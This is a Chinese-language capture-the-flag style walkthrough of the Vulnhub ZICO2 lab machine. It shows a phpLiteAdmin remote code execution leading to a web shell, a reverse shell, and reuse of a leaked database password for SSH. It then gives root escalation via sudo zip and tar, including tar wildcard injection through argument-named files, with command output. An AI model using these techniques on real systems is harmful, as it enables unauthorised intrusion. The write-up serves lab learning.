Vulnhub-靶機-ZICO2: 1
本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關
靶機下載之後使用僅主機模式載入到本地VMware Workstation工作站,需要發現目標靶機的IP地址,可以使用nmap,netdiscover,或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 當然也是可以使用Windows環境下mac地址掃描工具都是可以的,那麼本次演示就是arp-scan工具發現
地址:https://www.vulnhub.com/entry/zico2-1,210/
sudo nmap -n -p- -sC -sV -A 192.168.226.133 -o zico.nmap
nmap掃描結果
開放了80埠,我們先看看web應用
每個功能點都點選了一下,發現上述的CHECK THEM OUT! 點了進去進入如下頁面
把圖片都點了下,頁面的URL沒啥動靜,不過看URL的形態構造像是存在LFI,那麼試試看看
看到有個使用者zico,先放著使用gobuster掃描下目錄看看,看是否有突破口
看到dbadmin 和tools目錄,都訪問了下,發現dbadmin目錄下面有個php檔案,然後訪問之後看到如下
看到對應的名稱和版本號,在谷歌上搜索了下預設密碼是什麼 ,結果在https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/
然後用給出的名稱在本地kali上搜索了下,看是否存在漏洞
確認存在遠端程式碼執行漏洞,版本剛好對應上 1.9.3 對應exploit地址:https://www.exploit-db.com/exploits/24044
按照提示操作即可
建立表資訊,然後就可以建立php一句話程式碼了
測試執行效果
能夠執行命令,那麼這裡就通過使用Python反彈shell的形式拿shell,還可以使用metasploit,不過這個太偷懶了,畢竟是學東西,還有其他形式的反彈shell
https://jkme.github.io/pages/reverse-shell.htmlhttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
最終將Python的反彈shell程式碼經過URL編碼通過上面的檔案包含漏洞執行反彈成功shell
升級tty-shell
反彈成功之後,首先到家目錄看看,發現WordPress目錄,進去看看配置檔案目錄,看了一下,發現zico的資料庫密碼,用這個密碼去試試ssh登入
通過ssh登入看看
進去之後一把梭,執行了sudo -l 發現可以通過tar和zip進行提權,真好,擦!
---------------------------------------------------------------------------------------------------------------------------------------------
使用zip進行提權
zip提權大概意思就是本地新建一個空檔案,然後使用zip打包,再指定需要執行的命令即可 參考:https://www.freebuf.com/articles/system/206007.html
zico@zico:~$ touch bmfx zico@zico:~$ sudo zip /tmp/bmfx.zip /home/zico/bmfx -T --unzip-command="sh -c /bin/bash" adding: home/zico/bmfx (stored 0%) root@zico:~# id uid=0(root) gid=0(root) groups=0(root)
使用tar進行提權
tar提權重點是一樣的需要帶入引數--checkpoint 和 --checkpoint-action來執行命令,大概意思同樣是打包某一個檔案,但根據上面的命令實際並沒有使用tar打包,因為使用了/dev/null 最終目的是為了能夠帶入引數執行命令
zico@zico:~$ touch bmfx zico@zico:~$ sudo tar cf /dev/null /home/zico/bmfx --checkpoint=1 --checkpoint-action=exec=/bin/bash tar: Removing leading `/' from member names root@zico:~# whoami root root@zico:~# id uid=0(root) gid=0(root) groups=0(root)
髒牛提權
此方法網上有兩個對應的exp,通過加使用者的形式穩定,對應exp地址:https://github.com/FireFart/dirtycow不打算演示
另一種本地提權
參考:https://www.exploit-db.com/exploits/33589
使用find進行提權
大概意思如下:
find提權 (其實這裡也是使用了tar進行執行提權,然後轉到find,重點是find執行命令提權) 檢視是否存在find命令setuid執行許可權 find / -perm -4000 2>/dev/null | grep find 通過tar命令建立find命令具備setuid執行許可權 cd /tmp echo "chmod u+s /usr/bin/find" > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 sudo tar cf archive.tar * 建立完成確認find命令是否成功被賦予setuid許可權 find / -perm -4000 2>/dev/null | grep find 執行find命令開始提權 find /tmp -exec sh -i \;
重點解釋下:
echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1
上述兩條命令是為了建立兩個檔案,方便通過tar命令將此檔案當做命令去執行,需要理解這個即可,執行成功之後,檔案建立如下:
參考: